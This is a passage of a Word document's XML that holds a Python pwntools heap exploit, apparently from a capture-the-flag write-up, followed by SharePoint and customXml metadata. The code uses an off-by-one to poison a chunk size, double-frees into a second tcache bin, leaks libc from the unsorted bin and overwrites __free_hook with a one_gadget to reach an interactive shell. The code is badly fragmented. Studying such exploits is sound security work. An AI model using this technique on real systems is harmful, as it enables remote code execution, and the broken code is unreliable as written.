      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: [p64(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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x41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}, filler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b'B'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,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0x130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Empty pipe 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free(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Allocate a chunk before the target chunk and use the off-by-one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 poison the size</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alloc_hex(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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'A'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0x1e8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().encode()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b'1'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Free target chunk again to put it in another tcache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that the size is changed we can free it again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we will not cause a double-free abort as the target tcache bin is different</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    free(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Empty pipe 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    free(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pipe 0 with all small and last big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big chunk will end up in unsorted bin when freed</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alloc(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alloc(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b'.'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padding after the chunk that will end in unsorted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alloc(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b'.'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chunk in unsorted, now pipe 0 has 9/10 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    free(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pipe 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alloc(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b'.'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Broadcast, this will reclaim the unsorted, free it and put it in pipe 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    broadcast(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'@'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Alloc a small portion from the unsorted bin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 that when the freed message in pipe 1 is received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will free this message without crashing and also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leaking the pointers from the unsorted right after this chunk</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alloc(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b'W'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padding chunk from pipe 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    free(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Leak libc from unsorted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is when the 0x50 sized buffer is freed to prevent double freeing the unsorted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    libc_leak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u64(free(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b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00\x00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libc.address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libc_leak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libc.sym.main_arena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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.warning(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"libc leak : 0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%x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libc_leak)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.warning(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"libc base : 0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%x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libc.address)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Empty pipe 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 free(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the double freed tcache entry to get arb write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overwrite __free_hook with a one_gadget</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alloc(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p64(libc.sym.__free_hook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b"X"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x128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alloc(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b"A"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p64(libc.address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0xe3b01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b"B"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xe0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, pwn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r.interactive()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hyperlink" Target="https://github.com/david942j/one_gadget" TargetMode="Externa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david942j/one_gadg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CA710E2062148BD7DCF48F4042FFE" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="3352d4442e1ccffe03dd99b6fa2e3d48">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="3642c8d1-0f9e-444d-ac10-86dee6b00cb1" xmlns:ns3="058a3a59-13ac-4b83-b51d-82e534a58e6b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="73db486a872215d56b0bef9bf8588d92" ns2:_="" ns3:_="">
    <xsd:import namespace="3642c8d1-0f9e-444d-ac10-86dee6b00cb1"/>
    <xsd:import namespace="058a3a59-13ac-4b83-b51d-82e534a58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2c8d1-0f9e-444d-ac10-86dee6b00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f6ee25-ee90-4a3e-a579-e3b65577dd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a3a59-13ac-4b83-b51d-82e534a58e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31b7d62-95cc-44d1-8b9e-5cd9a6159ea3}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="058a3a59-13ac-4b83-b51d-82e534a58e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28642B-84A0-40E0-A849-CA081DBC886B}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4D4C135F-6CD5-4547-918D-7A9CC76210B5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2023-05-12T15:42:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-12T15:42:54Z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